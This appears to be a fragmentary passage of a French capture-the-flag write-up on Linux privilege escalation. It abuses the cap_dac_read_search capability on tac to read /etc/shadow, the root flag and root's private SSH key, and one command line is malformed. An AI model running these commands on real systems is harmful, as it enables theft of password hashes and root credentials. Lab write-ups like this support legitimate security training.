Nous listons les fichiers avec des capacités spécifiques :
getcap -r / 2>/dev/null
Nous identifions que tac dispose de la capacité cap_dac_read_search+ei :
cap_dac_read_search+ei
La commande tac (inverse de cat) nous permet de lire les fichiers en inversant leur contenu.
tac
cat
Lecture du flag root.txt
Récupération de la clé SSH root
Mis à jour il y a 1 an
tac /etc/shadow
tac /root/root.txt | tac
/usr/bin/tac | /root/.ssh/id_rsa | /usr/bin/tac
